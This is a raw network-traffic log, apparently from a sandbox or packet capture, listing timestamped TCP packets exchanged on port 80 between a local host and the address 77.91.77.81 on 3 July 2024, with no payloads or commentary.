Jul 3, 2024 18:09:05.977605104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977622032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977637053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977652073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977670908 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977680922 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977695942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977780104 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977797031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977811098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977826118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977826118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977842093 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977843046 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977866888 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977869034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977884054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977894068 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977962017 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977973938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977973938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978007078 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978100061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978125095 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978140116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978142023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978156090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978163004 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978173018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978173018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978188992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978192091 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978205919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978213072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978221893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978230953 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978239059 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978243113 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978260040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978275061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978458881 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978509903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978509903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978528023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978543997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978559017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978564024 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978570938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978586912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978599072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978749990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978765965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978780985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978795052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978797913 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978811979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.978815079 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978841066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.978866100 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979017973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979032993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979058027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979063034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979074955 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979078054 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979093075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979099035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979105949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979115963 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979131937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979135036 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979144096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979149103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979166031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979172945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979182005 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979182959 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979198933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979218006 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979239941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979587078 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979604006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979619026 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979635000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979671001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979679108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979734898 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979835987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979851007 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979898930 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979907036 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979914904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979923964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979942083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979948997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979958057 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979959011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.979984045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.979993105 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980187893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980211973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980227947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980240107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980243921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980258942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980259895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980268002 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980278015 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980288982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980294943 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980302095 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980313063 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.980323076 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980340958 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.980350018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996414900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996440887 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996463060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996479034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996500015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996510029 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996536016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996560097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996572971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996594906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996644974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996659994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996675014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.996685982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996700048 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.996720076 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032011986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032047987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032073975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032079935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032124996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032125950 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032138109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032150984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032177925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032180071 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032191992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032195091 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032207012 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032229900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032283068 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032324076 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032397032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032413006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032426119 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032438993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032438993 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032450914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032452106 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032464027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032475948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032510042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032690048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032713890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032726049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032736063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032737970 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032751083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032761097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032762051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032773972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.032785892 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032795906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.032825947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072618961 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072638988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072655916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072666883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072683096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072706938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072742939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072757959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072773933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072789907 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072789907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.072798014 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072820902 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.072834969 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073060989 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073076010 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073091030 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073101997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073101997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073106050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073122978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073128939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073138952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073141098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073156118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073167086 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073168039 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073173046 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073188066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073190928 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073218107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073225021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073450089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073463917 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073478937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073493004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073493004 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073508024 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073519945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073523998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073539972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073551893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073565006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073575020 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073580980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073590040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073596954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.073615074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.073645115 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074093103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074107885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074115992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074124098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074139118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074156046 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074170113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074184895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074198008 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074199915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074215889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074224949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074233055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074239016 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074249029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074264050 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074264050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074282885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074286938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074299097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074302912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074315071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074330091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074331045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074345112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074353933 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074392080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.074978113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.074994087 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075007915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075022936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075023890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075037003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075050116 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075052977 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075068951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075074911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075084925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075090885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075103045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075114965 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075119019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075134993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075136900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075150967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075153112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075166941 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075182915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075185061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075200081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075207949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075216055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075231075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075233936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075258970 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075284004 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075743914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075759888 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075773954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075797081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075798035 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075819969 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075820923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075838089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075845003 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075853109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075869083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075871944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075885057 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075896978 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075898886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075915098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075923920 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075930119 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075944901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075953960 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075961113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075963020 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.075975895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075992107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.075992107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.076004028 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.076011896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.076037884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.076055050 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.076523066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.076539040 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.076576948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.076591015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360646009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360677958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360704899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360723019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360733986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360743999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360745907 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360755920 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360775948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360821962 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360888004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360913038 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360930920 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360934973 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360944033 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360955954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360965014 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360969067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.360977888 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.360982895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.361010075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.361026049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363234043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363286018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363286018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363312960 CEST	80	62923	77.91.77.81	192.168.2.6
